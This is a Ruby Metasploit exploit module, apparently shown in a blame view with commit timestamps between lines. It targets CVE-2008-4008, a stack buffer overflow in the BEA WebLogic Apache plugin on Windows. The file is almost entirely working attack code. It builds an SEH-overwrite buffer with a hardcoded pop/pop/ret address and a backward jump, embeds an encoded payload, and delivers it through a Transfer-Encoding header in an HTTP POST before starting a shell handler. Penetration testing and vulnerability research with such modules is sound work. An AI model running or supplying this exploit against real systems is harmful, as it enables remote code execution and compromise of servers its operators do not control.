Files
metasploit-gs/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb
T

77 lines
2.0 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2013-08-30 16:28:54 -05:00
Rank = GreatRanking
2013-08-30 16:28:54 -05:00
HttpFingerprint = { :pattern => [ /Apache/ ] }
2010-07-07 17:38:59 +00:00
2013-08-30 16:28:54 -05:00
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Seh
2013-08-30 16:28:54 -05:00
def initialize(info = {})
super(update_info(info,
'Name' => 'BEA Weblogic Transfer-Encoding Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in the BEA
Weblogic Apache plugin. This vulnerability exists in the
error reporting for unknown Transfer-Encoding headers.
You may have to run this twice due to timing issues with handlers.
},
'Author' => 'pusscat',
'References' =>
[
[ 'CVE', '2008-4008' ],
[ 'OSVDB', '49283' ]
2013-08-30 16:28:54 -05:00
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Privileged' => true,
'Platform' => 'win',
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x0d\x0a",
'StackAdjustment' => -1500,
},
'Targets' =>
[
[ 'Windows Apache 2.2 version Universal',
{
'Ret' => 0x1001f4d6, #pop/pop/ret
}
],
],
'DisclosureDate' => 'Sep 09 2008',
'DefaultTarget' => 0))
end
2013-08-30 16:28:54 -05:00
def exploit
2010-07-08 23:34:50 +00:00
2013-08-30 16:28:54 -05:00
sploit = rand_text_alphanumeric(5800)
sploit[5781, 8] = generate_seh_record(target.ret)
# Jump backward to the payload
sploit[5789, 5] = "\xe9\x5e\xe9\xff\xff"
sploit[0, payload.encoded.length+7] = make_nops(7) + payload.encoded
2013-08-30 16:28:54 -05:00
datastore['VHOST'] = 'localhost'
send_request_cgi(
{
'method' => 'POST',
'url' => '/index.jsp',
'data' => '',
'headers' =>
{
'Transfer-Encoding' => sploit
}
})
2010-07-08 23:34:50 +00:00
2013-08-30 16:28:54 -05:00
handler
2013-08-30 16:28:54 -05:00
end
end